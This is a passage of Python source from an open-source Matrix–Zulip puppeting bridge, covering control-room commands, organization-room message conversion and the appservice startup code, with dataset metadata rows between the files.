if not room.user_id:
continue
users.add(room.user_id)
users = list(users)
users.sort()
else:
users.add(self.user_id)
response += f"I have {len(users)} known users:"
for user_id in users:
ncontrol = len(self.serv.find_rooms("ControlRoom", user_id))
response += f"<br>{indent(1)}{user_id} ({ncontrol} open control rooms):"
for organization in self.serv.find_rooms("OrganizationRoom", user_id):
connected = "not connected"
stream = "no streams"
direct = "no DMs"
if organization.zulip and organization.zulip.has_connected:
connected = f"connected to {organization.site}"
nstream = 0
ndirect = len(organization.direct_rooms)
for room in organization.rooms.values():
if type(room).__name__ == "StreamRoom":
nstream += 1
if nstream > 0:
stream = f"{nstream} streams"
if ndirect > 0:
direct = f"{ndirect} DMs"
response += f"<br>{indent(2)}{organization.name}, {connected}, {stream}, {direct}"
self.send_notice_html(response)
async def cmd_forget(self, args):
if args.user == self.user_id:
return self.send_notice("I can't forget you, silly!")
rooms = self.serv.find_rooms(None, args.user)
if len(rooms) == 0:
return self.send_notice("No such user. See STATUS for list of users.")
# disconnect each organization room in first pass
for room in rooms:
            if type(room) == OrganizationRoom and room.zulip and room.zulip.has_connected:
self.send_notice(f"Disconnecting {args.user} from {room.name}...")
await room.cmd_disconnect(Namespace())
self.send_notice(f"Leaving all {len(rooms)} rooms {args.user} was in...")
# then just forget everything
for room in rooms:
self.serv.unregister_room(room.id)
try:
await self.az.intent.leave_room(room.id)
except MatrixRequestError:
pass
try:
await self.az.intent.forget_room(room.id)
except MatrixRequestError:
pass
self.send_notice(f"Done, I have forgotten about {args.user}")
async def cmd_displayname(self, args):
try:
await self.az.intent.set_displayname(args.displayname)
except MatrixRequestError as e:
self.send_notice(f"Failed to set displayname: {str(e)}")
async def cmd_avatar(self, args):
try:
await self.az.intent.set_avatar_url(args.url)
except MatrixRequestError as e:
self.send_notice(f"Failed to set avatar: {str(e)}")
async def cmd_ident(self, args):
idents = self.serv.config["idents"]
if args.cmd == "list" or args.cmd is None:
self.send_notice("Configured custom idents:")
for mxid, ident in idents.items():
self.send_notice(f"\t{mxid} -> {ident}")
elif args.cmd == "set":
if not re.match(r"^[a-z][-a-z0-9]*$", args.ident):
self.send_notice(f"Invalid ident string: {args.ident}")
self.send_notice(
"Must be lowercase, start with a letter, can contain dashes, letters and numbers."
)
else:
idents[args.mxid] = args.ident
self.send_notice(f"Set custom ident for {args.mxid} to {args.ident}")
await self.serv.save()
elif args.cmd == "remove":
if args.mxid in idents:
del idents[args.mxid]
self.send_notice(f"Removed custom ident for {args.mxid}")
await self.serv.save()
else:
self.send_notice(f"No custom ident for {args.mxid}")
async def cmd_sync(self, args):
if args.lazy:
self.serv.config["member_sync"] = "lazy"
await self.serv.save()
elif args.half:
self.serv.config["member_sync"] = "half"
await self.serv.save()
elif args.full:
self.serv.config["member_sync"] = "full"
await self.serv.save()
self.send_notice(f"Member sync is set to {self.serv.config['member_sync']}")
async def cmd_media_url(self, args):
if args.remove:
self.serv.config["media_url"] = None
await self.serv.save()
self.serv.endpoint = await self.serv.detect_public_endpoint()
elif args.url:
parsed = urlparse(args.url)
if (
parsed.scheme in ["http", "https"]
and not parsed.params
and not parsed.query
and not parsed.fragment
):
self.serv.config["media_url"] = args.url
await self.serv.save()
self.serv.endpoint = args.url
else:
self.send_notice(f"Invalid media URL format: {args.url}")
return
self.send_notice(
f"Media URL override is set to {self.serv.config['media_url']}"
)
self.send_notice(f"Current active media URL: {self.serv.endpoint}")
async def cmd_media_path(self, args):
if args.remove:
self.serv.config["media_path"] = None
await self.serv.save()
self.serv.media_path = self.serv.DEFAULT_MEDIA_PATH
elif args.path:
self.serv.config["media_path"] = args.path
await self.serv.save()
self.serv.media_path = args.path
self.send_notice(
f"Media Path override is set to {self.serv.config['media_path']}"
)
self.send_notice(f"Current active media path: {self.serv.media_path}")
async def cmd_open(self, args):
organizations = self.organizations()
name = args.name.lower()
if name not in organizations:
return self.send_notice("Organization does not exist")
organization = organizations[name]
found = 0
for room in self.serv.find_rooms(OrganizationRoom, self.user_id):
if room.name == organization["name"]:
found += 1
if not args.new:
if self.user_id not in room.members:
self.send_notice(f"Inviting back to {room.name} ({room.id})")
await self.az.intent.invite_user(room.id, self.user_id)
else:
self.send_notice(f"You are already in {room.name} ({room.id})")
# if we found at least one organization room, no need to create unless forced
if found > 0 and not args.new:
return
name = (
organization["name"]
if found == 0
else f"{organization['name']} {found + 1}"
)
self.send_notice(f"You have been invited to {name}")
await OrganizationRoom.create(self.serv, organization, self.user_id, name)
async def cmd_quit(self, args):
rooms = self.serv.find_rooms(None, self.user_id)
# disconnect each organization room in first pass
for room in rooms:
if (
type(room) == OrganizationRoom
and room.zulip
and room.zulip.has_connected
):
self.send_notice(f"Disconnecting from {room.name}...")
await room.cmd_disconnect(Namespace())
self.send_notice("Closing all channels and private messages...")
# then just forget everything
for room in rooms:
if room.id == self.id:
continue
self.serv.unregister_room(room.id)
try:
await self.az.intent.leave_room(room.id)
except MatrixRequestError:
pass
try:
await self.az.intent.forget_room(room.id)
except MatrixRequestError:
pass
async def cmd_version(self, args):
self.send_notice(f"zulipbridge v{__version__}")
async def cmd_personalroom(self, args) -> None:
organization = None
for room in self.serv.find_rooms():
if not isinstance(room, OrganizationRoom):
continue
if room.name.lower() == args.organization:
organization = room
break
if not organization:
# TODO: Add permissions for creating a personal room
self.send_notice(
"Could not find an organization with that name or you don't have permissions"
)
return
await PersonalRoom.create(organization, self.user_id)
self.send_notice("Personal room created")
def indent(n):
return " " * n * 8
| 19,552 | Python | .py | 435 | 33.110345 | 130 | 0.586766 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,578 | under_organization_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/under_organization_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING, Optional
from urllib.parse import quote, urlparse
from bs4 import BeautifulSoup
from markdownify import markdownify
from mautrix.errors import MatrixStandardRequestError
from mautrix.types.event.state import (
JoinRestriction,
JoinRestrictionType,
JoinRule,
JoinRulesStateEventContent,
)
from mautrix.types.event.type import EventType
from matrixzulipbridge.room import InvalidConfigError, Room
if TYPE_CHECKING:
from mautrix.types import MessageEvent, RoomID, UserID
from matrixzulipbridge.organization_room import OrganizationRoom
def connected(f):
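    """Decorator requiring an active Zulip connection before running a room command."""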
def wrapper(*args, **kwargs):
self = args[0]
if not self.organization.zulip or not self.organization.zulip.has_connected:
self.send_notice("Need to be connected to use this command.")
return asyncio.sleep(0)
return f(*args, **kwargs)
return wrapper
class UnderOrganizationRoom(Room):
"""Base class for all rooms under an organization"""
organization: Optional["OrganizationRoom"]
organization_id: "RoomID"
force_forward: bool
def init(self) -> None:
self.organization = None
self.organization_id = None
self.force_forward = True
def from_config(self, config: dict) -> None:
super().from_config(config)
self.organization_id = config["organization_id"]
if not self.organization_id:
raise InvalidConfigError("No organization_id in config for room")
def to_config(self) -> dict:
return {
**(super().to_config()),
"organization_id": self.organization_id,
}
def is_valid(self) -> bool:
if self.organization_id is None:
return False
return True
async def join_existing_room(self, room_id: "RoomID"):
self.id = await self.organization.az.intent.join_room(room_id)
if self.id is None:
self.organization.send_notice(f"Could not join room {room_id}")
return
self.serv.register_room(self)
await self.save()
# start event queue now that we have an id
self._queue.start()
# attach to organization space
if self.organization.space:
await self.organization.space.attach(self.id)
async def _process_event_content(
self,
event: "MessageEvent",
prefix: str = "",
reply_to=None,
topic: str = None,
):
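        """Convert a Matrix message event into Zulip-flavored Markdown.
        Media messages become links, mentions of bridge puppets are rewritten
        as native Zulip mentions, and Matrix reply fallbacks are pointed at
        the corresponding Zulip message narrow.
        """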
content = event.content
if content.msgtype.is_media:
media_url = self.serv.mxc_to_url(
mxc=event.content.url, filename=event.content.body
)
message = f"[{content.body}]({media_url})"
elif content.formatted_body:
message = content.formatted_body
# Replace all puppet mentions with Zulip mentions
soup = BeautifulSoup(content.formatted_body, features="html.parser")
for link in soup.find_all("a"):
href: str = link.get("href", "")
if not href.startswith("https://matrix.to/#/"):
continue
mxid = href.split("https://matrix.to/#/")[1]
# Translate puppet mentions as native Zulip mentions
if not self.serv.is_puppet(mxid):
continue
user_id = self.organization.get_zulip_user_id_from_mxid(mxid)
zulip_user = self.organization.get_zulip_user(user_id)
zulip_mention = soup.new_tag("span")
zulip_mention.string = " @"
zulip_mention_content = soup.new_tag("strong")
zulip_mention_content.string = f"{zulip_user['full_name']}|{user_id}"
zulip_mention.append(zulip_mention_content)
link.replace_with(zulip_mention)
if reply_to is not None:
# Attempt to parse reply, it's alright if this fails
try:
reply_block = soup.find("mx-reply")
if reply_block is not None:
links = reply_block.find_all("a")
if type(self).__name__ in (
"DirectRoom",
"StreamRoom",
):
# Replace reply event link with Zulip link
in_reply_to_link = links[0]
narrow = self._construct_zulip_narrow_url(
topic=topic,
message_id=self.messages.inv.get(reply_to.event_id),
)
in_reply_to_link["href"] = narrow
# Replace mxid with display name (non-puppet users)
if len(links) > 1:
author_link = links[1]
author_mxid = author_link["href"].split(
"https://matrix.to/#/"
)[1]
author_link.string.replace_with(
self._get_displayname(author_mxid)
)
except Exception: # pylint: disable=broad-exception-caught
pass
message = soup.encode(formatter="html5")
message = markdownify(message)
elif content.body:
message = content.body
else:
logging.warning("_process_event_content called with no usable body")
return
message = prefix + message
return message
def _get_displayname(self, mxid: "UserID"):
if mxid in self.displaynames:
sender_displayname = self.displaynames[mxid][:100]
return sender_displayname
# Fallback to mxid
return mxid
def _construct_zulip_narrow_url(self, topic=None, message_id=None):
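        # build a Zulip permalink ("narrow") URL; illustrative shape:
        # https://zulip.example.com/#narrow/stream/42/topic/foo/near/123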
zulip_uri = urlparse(self.organization.zulip.base_url)
base_url = zulip_uri.scheme + "://" + zulip_uri.netloc
narrow = base_url + "/#narrow"
if type(self).__name__ == "DirectRoom":
recipients_string = ""
for recipient in set(self.recipient_ids):
recipients_string += str(recipient) + ","
recipients_string = recipients_string[:-1]
narrow += f"/dm/{recipients_string}"
elif type(self).__name__ == "StreamRoom":
narrow += f"/stream/{self.stream_id}"
if topic is not None:
narrow += f"/topic/{quote(topic, safe='')}"
if message_id is not None:
narrow += f"/near/{message_id}"
return narrow
async def _attach_space_internal(self) -> None:
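        # restrict joins to members of the organization space (requires room version 9+)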
await self.az.intent.send_state_event(
self.id,
            EventType.ROOM_JOIN_RULES,  # EventType members are dynamic; pylint: disable=no-member
content=JoinRulesStateEventContent(
join_rule=JoinRule.RESTRICTED,
allow=[
JoinRestriction(
type=JoinRestrictionType.ROOM_MEMBERSHIP,
room_id=self.organization.space.id,
),
],
),
)
async def _attach_space(self) -> None:
logging.debug(
f"Attaching room {self.id} to organization space {self.organization.space.id}."
)
try:
room_create = await self.az.intent.get_state_event(
self.id, EventType.ROOM_CREATE # pylint: disable=no-member
            )
if room_create.room_version in [str(v) for v in range(1, 9)]:
self.send_notice(
"Only rooms of version 9 or greater can be attached to a space."
)
self.send_notice(
"Leave and re-create the room to ensure the correct version."
)
return
await self._attach_space_internal()
self.send_notice("Attached to space.")
except MatrixStandardRequestError as e:
logging.debug("Setting join_rules for space failed.", exc_info=True)
self.send_notice(f"Failed attaching space: {e.message}")
self.send_notice("Make sure the room is at least version 9.")
except Exception:
logging.exception(
f"Failed to attach {self.id} to space {self.organization.space.id}."
)
| 9,566 | Python | .py | 217 | 32.235023 | 95 | 0.58687 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,579 | __main__.py | GearKite_MatrixZulipBridge/matrixzulipbridge/__main__.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import argparse
import asyncio
import grp
import logging
import os
import pwd
import random
import re
import string
import sys
import urllib
from fnmatch import fnmatch
from typing import TYPE_CHECKING, Optional
from mautrix.api import HTTPAPI, Method, Path, SynapseAdminPath
from mautrix.appservice import AppService as MauService
from mautrix.appservice.state_store import ASStateStore
from mautrix.client.state_store.memory import MemoryStateStore
from mautrix.errors import (
MatrixConnectionError,
MatrixRequestError,
MForbidden,
MNotFound,
MUserInUse,
)
from mautrix.types import Membership
from mautrix.util.bridge_state import BridgeState, BridgeStateEvent
from mautrix.util.config import yaml
from matrixzulipbridge import __version__
from matrixzulipbridge.appservice import AppService
from matrixzulipbridge.control_room import ControlRoom
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.personal_room import PersonalRoom
from matrixzulipbridge.room import Room, RoomInvalidError
from matrixzulipbridge.space_room import SpaceRoom
from matrixzulipbridge.stream_room import StreamRoom
from matrixzulipbridge.websocket import AppserviceWebsocket
try: # Optionally load coloredlogs
import coloredlogs
except ModuleNotFoundError:
pass
if TYPE_CHECKING:
from mautrix.types import Event, RoomID, UserID
from matrixzulipbridge.types import ZulipUserID
class MemoryBridgeStateStore(ASStateStore, MemoryStateStore):
def __init__(self) -> None:
ASStateStore.__init__(self)
MemoryStateStore.__init__(self)
class BridgeAppService(AppService):
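    """Main appservice implementation bridging Matrix rooms to Zulip."""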
_api: HTTPAPI
_rooms: dict[str, Room]
_users: dict[str, str]
DEFAULT_MEDIA_PATH = "/_matrix/media/v3/download/{netloc}{path}{filename}"
registration: Optional[dict]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.registration = None
self.puppet_separator = None
self.puppet_prefix = None
self.api = None
self.synapse_admin = None
self.endpoint = None
async def push_bridge_state(
self,
state_event: BridgeStateEvent,
error=None,
message=None,
ttl=None,
remote_id=None,
) -> None:
if (
"zulipbridge" not in self.registration
or "status_endpoint" not in self.registration["zulipbridge"]
):
return
state = BridgeState(
state_event=state_event,
error=error,
message=message,
ttl=ttl,
remote_id=remote_id,
)
logging.debug(f"Updating bridge state {state}")
await state.send(
self.registration["zulipbridge"]["status_endpoint"],
self.az.as_token,
log=logging,
)
def register_room(self, room: Room):
self._rooms[room.id] = room
def unregister_room(self, room_id: "RoomID"):
if room_id in self._rooms:
del self._rooms[room_id]
    # mostly used by organization rooms at init; linear scan, so a bit slow
def find_rooms(
self, rtype=None, user_id: "UserID" = None, organization_id: "RoomID" = None
) -> list[Room]:
ret = []
if rtype is not None and not isinstance(rtype, str):
rtype = rtype.__name__
for room in self._rooms.values():
if (
(rtype is None or room.__class__.__name__ == rtype)
and (user_id is None or room.user_id == user_id)
and (organization_id is None or room.organization_id == organization_id)
):
ret.append(room)
return ret
def is_admin(self, user_id: "UserID"):
if user_id == self.config["owner"]:
return True
for mask, value in self.config["allow"].items():
if fnmatch(user_id, mask) and value == "admin":
return True
return False
def is_user(self, user_id: "UserID"):
if self.is_admin(user_id):
return True
for mask in self.config["allow"].keys():
if fnmatch(user_id, mask):
return True
return False
def is_local(self, mxid: "UserID"):
return mxid.endswith(":" + self.server_name)
def is_puppet(self, mxid: "UserID") -> bool:
"""Checks whether a given MXID is our puppet
Args:
mxid (str): Matrix user ID
Returns:
bool:
"""
return mxid.startswith("@" + self.puppet_prefix) and self.is_local(mxid)
def get_mxid_from_zulip_user_id(
self,
organization: "OrganizationRoom",
zulip_user_id: "ZulipUserID",
at=True,
server=True,
) -> "UserID":
ret = re.sub(
r"[^0-9a-z\-\.=\_/]",
lambda m: "=" + m.group(0).encode("utf-8").hex(),
f"{self.puppet_prefix}{organization.name}{self.puppet_separator}{zulip_user_id}".lower(),
)
# ret = f"{self.puppet_prefix}{organization.site}{self.puppet_separator}{zulip_user_id}".lower()
if at:
ret = "@" + ret
if server:
ret += ":" + self.server_name
return ret
async def cache_user(self, user_id: "UserID", displayname: str):
# start by caching that the user_id exists without a displayname
if user_id not in self._users:
self._users[user_id] = None
# if the cached displayname is incorrect
if displayname and self._users[user_id] != displayname:
try:
await self.az.intent.user(user_id).set_displayname(displayname)
self._users[user_id] = displayname
except MatrixRequestError as e:
logging.warning(
f"Failed to set displayname '{displayname}' for user_id '{user_id}', got '{e}'"
)
def is_user_cached(self, user_id: "UserID", displayname: str = None):
return user_id in self._users and (
displayname is None or self._users[user_id] == displayname
)
async def ensure_zulip_user_id(
self,
organization: "OrganizationRoom",
zulip_user_id: "ZulipUserID" = None,
update_cache=True,
zulip_user: dict = None,
):
if zulip_user_id is None:
zulip_user_id = zulip_user["user_id"]
mx_user_id = self.get_mxid_from_zulip_user_id(organization, zulip_user_id)
# if we've seen this user before, we can skip registering
if not self.is_user_cached(mx_user_id):
await self.az.intent.user(mx_user_id).ensure_registered()
# always ensure the displayname is up-to-date
if update_cache:
zulip_user = organization.get_zulip_user(zulip_user_id)
await self.cache_user(mx_user_id, zulip_user["full_name"])
return mx_user_id
async def _on_mx_event(self, event: "Event"):
if event.room_id and event.room_id in self._rooms:
try:
room = self._rooms[event.room_id]
await room.on_mx_event(event)
except RoomInvalidError:
logging.info(
f"Event handler for {event.type} threw RoomInvalidError, leaving and cleaning up."
)
self.unregister_room(room.id)
room.cleanup()
await self.leave_room(room.id, room.members)
except Exception:
logging.exception(
"Ignoring exception from room handler. This should be fixed."
)
elif (
str(event.type) == "m.room.member"
and event.sender != self.user_id
and event.content.membership == Membership.INVITE
):
# set owner if we have none and the user is from the same HS
if self.config.get("owner", None) is None and event.sender.endswith(
":" + self.server_name
):
logging.info(f"We have an owner now, let us rejoice, {event.sender}!")
self.config["owner"] = event.sender
await self.save()
if not self.is_user(event.sender):
logging.info(
f"Non-whitelisted user {event.sender} tried to invite us, ignoring."
)
return
else:
logging.info(f"Got an invite from {event.sender}")
if not event.content.is_direct:
logging.debug("Got an invite to non-direct room, ignoring")
return
        # only respond to invites to unknown new rooms
if event.room_id in self._rooms:
logging.debug("Got an invite to room we're already in, ignoring")
return
# handle invites against puppets
if event.state_key != self.user_id:
logging.info(
f"Whitelisted user {event.sender} invited {event.state_key}, going to reject."
)
try:
await self.az.intent.user(event.state_key).kick_user(
event.room_id,
event.state_key,
"Will invite YOU instead",
)
except Exception:
logging.exception("Failed to reject invitation.")
raise NotImplementedError(
"Puppet invites as profile query"
            )  # TODO: implement
for room in self.find_rooms(OrganizationRoom, event.sender):
pass
return
logging.info(
f"Whitelisted user {event.sender} invited us, going to accept."
)
# accept invite sequence
try:
room = ControlRoom(
id=event.room_id,
user_id=event.sender,
serv=self,
members=[event.sender],
bans=[],
)
await room.save()
self.register_room(room)
await self.az.intent.join_room(room.id)
# show help on open
await room.show_help()
except Exception:
if event.room_id in self._rooms:
del self._rooms[event.room_id]
logging.exception("Failed to create control room.")
else:
pass
async def detect_public_endpoint(self):
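        """Detect the homeserver's public base URL.
        Tries the client .well-known first, then a direct https request,
        and falls back to the internal URL as a last resort.
        """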
async with self.api.session as session:
# first try https well-known
try:
resp = await session.request(
"GET",
f"https://{self.server_name}/.well-known/matrix/client",
)
data = await resp.json(content_type=None)
return data["m.homeserver"]["base_url"]
except Exception:
logging.debug("Did not find .well-known for HS")
# try https directly
try:
resp = await session.request(
"GET", f"https://{self.server_name}/_matrix/client/versions"
)
await resp.json(content_type=None)
return f"https://{self.server_name}"
except Exception:
logging.debug("Could not use direct connection to HS")
# give up
logging.warning(
"Using internal URL for homeserver, media links are likely broken!"
)
return str(self.api.base_url)
def mxc_to_url(self, mxc: str, filename: str = None):
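        # translate an mxc:// URI into a public HTTP(S) download URL using the configured media path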
mxc = urllib.parse.urlparse(mxc)
if filename is None:
filename = ""
else:
filename = "/" + urllib.parse.quote(filename)
media_path = self.media_path.format(
netloc=mxc.netloc, path=mxc.path, filename=filename
)
return self.endpoint + media_path
async def reset(self, config_file, homeserver_url):
with open(config_file, encoding="utf-8") as f:
registration = yaml.load(f)
api = HTTPAPI(base_url=homeserver_url, token=registration["as_token"])
whoami = await api.request(Method.GET, Path.v3.account.whoami)
self.user_id = whoami["user_id"]
self.server_name = self.user_id.split(":", 1)[1]
logging.info("We are " + whoami["user_id"])
self.az = MauService(
id=registration["id"],
domain=self.server_name,
server=homeserver_url,
as_token=registration["as_token"],
hs_token=registration["hs_token"],
bot_localpart=registration["sender_localpart"],
state_store=MemoryBridgeStateStore(),
)
try:
await self.az.start(host="127.0.0.1", port=None)
except Exception:
logging.exception("Failed to listen.")
return
joined_rooms = await self.az.intent.get_joined_rooms()
logging.info(f"Leaving from {len(joined_rooms)} rooms...")
for room_id in joined_rooms:
logging.info(f"Leaving from {room_id}...")
await self.leave_room(room_id, None)
logging.info("Resetting configuration...")
self.config = {}
await self.save()
logging.info("All done!")
def load_reg(self, config_file):
with open(config_file, encoding="utf-8") as f:
self.registration = yaml.load(f)
async def leave_room(self, room_id: "RoomID", members: list["UserID"]):
members = members if members else []
for member in members:
(name, server) = member.split(":", 1)
if name.startswith("@" + self.puppet_prefix) and server == self.server_name:
try:
await self.az.intent.user(member).leave_room(room_id)
except Exception:
logging.exception("Removing puppet on leave failed")
try:
await self.az.intent.leave_room(room_id)
except MatrixRequestError:
pass
try:
await self.az.intent.forget_room(room_id)
except MatrixRequestError:
pass
def _keepalive(self):
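        # periodically refresh the bot's presence so it does not appear offline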
async def put_presence():
try:
await self.az.intent.set_presence(self.user_id)
except Exception:
pass
asyncio.ensure_future(put_presence())
asyncio.get_running_loop().call_later(60, self._keepalive)
async def run(
self, listen_address, listen_port, homeserver_url, owner, unsafe_mode
):
if "sender_localpart" not in self.registration:
logging.critical("Missing sender_localpart from registration file.")
sys.exit(1)
if (
"namespaces" not in self.registration
or "users" not in self.registration["namespaces"]
):
logging.critical("User namespaces missing from registration file.")
sys.exit(1)
# remove self namespace if exists
ns_users = [
x
for x in self.registration["namespaces"]["users"]
if x["regex"].split(":")[0] != f"@{self.registration['sender_localpart']}"
]
if len(ns_users) != 1:
logging.critical(
"A single user namespace is required for puppets in the registration file."
)
sys.exit(1)
if "exclusive" not in ns_users[0] or not ns_users[0]["exclusive"]:
logging.critical("User namespace must be exclusive.")
sys.exit(1)
m = re.match(r"^@(.+)([\_/])\.[\*\+]:?", ns_users[0]["regex"])
if not m:
logging.critical(
"User namespace regex must be an exact prefix like '@zulip_bridge_.*' that includes the separator character (_ or /)."
)
sys.exit(1)
self.puppet_separator = m.group(2)
self.puppet_prefix = m.group(1) + self.puppet_separator
logging.info(f"zulipbridge v{__version__}")
if unsafe_mode:
logging.warning("Running in unsafe mode, bridge may leave rooms on error")
url = urllib.parse.urlparse(homeserver_url)
ws = None
if url.scheme in ["ws", "wss"]:
logging.info(
f"Using websockets to receive transactions. Listening is still enabled on http://{listen_address}:{listen_port}"
)
ws = AppserviceWebsocket(
homeserver_url, self.registration["as_token"], self._on_mx_event
)
homeserver_url = url._replace(
scheme=("https" if url.scheme == "wss" else "http")
).geturl()
logging.info(f"Connecting to HS at {homeserver_url}")
self.api = HTTPAPI(base_url=homeserver_url, token=self.registration["as_token"])
# conduit requires that the appservice user is registered before whoami
wait = 0
while True:
try:
await self.api.request(
Method.POST,
Path.v3.register,
{
"type": "m.login.application_service",
"username": self.registration["sender_localpart"],
},
)
logging.debug("Appservice user registration succeeded.")
break
except MUserInUse:
logging.debug("Appservice user is already registered.")
break
except MatrixConnectionError as e:
if wait < 30:
wait += 5
logging.warning(
f"Failed to connect to HS: {e}, retrying in {wait} seconds..."
)
await asyncio.sleep(wait)
except Exception:
logging.exception(
"Unexpected failure when registering appservice user."
)
sys.exit(1)
# mautrix migration requires us to call whoami manually at this point
whoami = await self.api.request(Method.GET, Path.v3.account.whoami)
logging.info("We are %s", whoami["user_id"])
self.user_id = whoami["user_id"]
self.server_name = self.user_id.split(":", 1)[1]
self.az = MauService(
id=self.registration["id"],
domain=self.server_name,
server=homeserver_url,
as_token=self.registration["as_token"],
hs_token=self.registration["hs_token"],
bot_localpart=self.registration["sender_localpart"],
state_store=MemoryBridgeStateStore(),
)
self.az.matrix_event_handler(self._on_mx_event)
try:
await self.az.start(host=listen_address, port=listen_port)
except Exception:
logging.exception("Failed to listen.")
sys.exit(1)
try:
await self.az.intent.ensure_registered()
logging.debug("Appservice user exists at least now.")
except Exception:
logging.exception("Unexpected failure when registering appservice user.")
sys.exit(1)
if (
"zulipbridge" in self.registration
and "displayname" in self.registration["zulipbridge"]
):
try:
logging.debug(
f"Overriding displayname from registration file to {self.registration['zulipbridge']['displayname']}"
)
await self.az.intent.set_displayname(
self.registration["zulipbridge"]["displayname"]
)
except MatrixRequestError as e:
logging.warning(f"Failed to set displayname: {str(e)}")
self._rooms = {}
self._users = {}
self.config = {
"organizations": {},
"owner": None,
"member_sync": "half",
"media_url": None,
"media_path": None,
"namespace": self.puppet_prefix,
"allow": {},
}
logging.debug(f"Default config: {self.config}")
self.synapse_admin = False
try:
is_admin = await self.api.request(
Method.GET, SynapseAdminPath.v1.users[self.user_id].admin
)
self.synapse_admin = is_admin["admin"]
except MForbidden:
logging.info(
f"We ({self.user_id}) are not a server admin, inviting puppets is required."
)
except Exception:
logging.info(
"Seems we are not connected to Synapse, inviting puppets is required."
)
# load config from HS
await self.load()
async def _resolve_media_endpoint():
endpoint = await self.detect_public_endpoint()
# only rewrite it if it wasn't changed
if self.endpoint == str(self.api.base_url):
self.endpoint = endpoint
logging.info("Homeserver is publicly available at " + self.endpoint)
# use configured media_url for endpoint if we have it
if (
"zulipbridge" in self.registration
and "media_url" in self.registration["zulipbridge"]
):
logging.debug(
f"Overriding media URL from registration file to {self.registration['zulipbridge']['media_url']}"
)
self.endpoint = self.registration["zulipbridge"]["media_url"]
elif self.config["media_url"]:
self.endpoint = self.config["media_url"]
else:
logging.info(
"Trying to detect homeserver public endpoint, this might take a while..."
)
self.endpoint = str(self.api.base_url)
asyncio.ensure_future(_resolve_media_endpoint())
# use configured media_path for media_path if we have it
if (
"zulipbridge" in self.registration
and "media_path" in self.registration["zulipbridge"]
):
logging.debug(
f"Overriding media path from registration file to {self.registration['zulipbridge']['media_path']}"
)
self.media_path = self.registration["zulipbridge"]["media_path"]
elif self.config["media_path"]:
self.media_path = self.config["media_path"]
else:
self.media_path = self.DEFAULT_MEDIA_PATH
logging.info("Starting presence loop")
self._keepalive()
# prevent starting bridge with changed namespace
if self.config["namespace"] != self.puppet_prefix:
logging.error(
f"Previously used namespace '{self.config['namespace']}' does not match current '{self.puppet_prefix}'."
)
sys.exit(1)
# honor command line owner
if owner is not None and self.config["owner"] != owner:
logging.info(f"Overriding loaded owner with '{owner}'")
self.config["owner"] = owner
# always ensure our merged and migrated configuration is up-to-date
await self.save()
logging.info("Fetching joined rooms...")
joined_rooms = await self.az.intent.get_joined_rooms()
logging.debug(f"Appservice rooms: {joined_rooms}")
logging.info(f"Bridge is in {len(joined_rooms)} rooms, initializing them...")
Room.init_class(self.az)
        # room types and their init order; organization rooms must come before direct and stream rooms
room_types = [
ControlRoom,
OrganizationRoom,
DirectRoom,
StreamRoom,
PersonalRoom,
SpaceRoom,
]
room_type_map = {}
for room_type in room_types:
room_type.init_class(self.az)
room_type_map[room_type.__name__] = room_type
# we always auto-open control room for owner
owner_control_open = False
# import all rooms
for room_id in joined_rooms:
joined = {}
try:
config = await self.az.intent.get_account_data("zulip", room_id)
if "type" not in config or "user_id" not in config:
raise Exception("Invalid config")
cls = room_type_map.get(config["type"])
if not cls:
raise Exception("Unknown room type")
# refresh room members state
await self.az.intent.get_room_members(room_id)
joined = await self.az.state_store.get_member_profiles(
room_id, (Membership.JOIN,)
)
banned = await self.az.state_store.get_members(
room_id, (Membership.BAN,)
)
room = cls(
id=room_id,
user_id=config["user_id"],
serv=self,
members=joined.keys(),
bans=banned,
)
room.from_config(config)
                # add to the room's displayname cache
for user_id, member in joined.items():
if member.displayname is not None:
room.displaynames[user_id] = member.displayname
# add to global puppet cache if it's a puppet
if self.is_puppet(user_id):
self._users[user_id] = member.displayname
# only add valid rooms to event handler
if room.is_valid():
self._rooms[room_id] = room
else:
room.cleanup()
raise Exception("Room validation failed after init")
if cls == ControlRoom and room.user_id == self.config["owner"]:
owner_control_open = True
except MNotFound:
logging.error(
f"Leaving room with no data: {room_id}. How did this happen?"
)
self.unregister_room(room_id)
await self.leave_room(room_id, joined.keys())
except Exception:
logging.exception(
f"Failed to reconfigure room {room_id} during init, leaving."
)
# regardless of safe mode, we ignore this room
self.unregister_room(room_id)
if unsafe_mode:
await self.leave_room(room_id, joined.keys())
logging.info("All valid rooms initialized, connecting organization rooms...")
wait = 1
for room in list(self._rooms.values()):
await room.post_init()
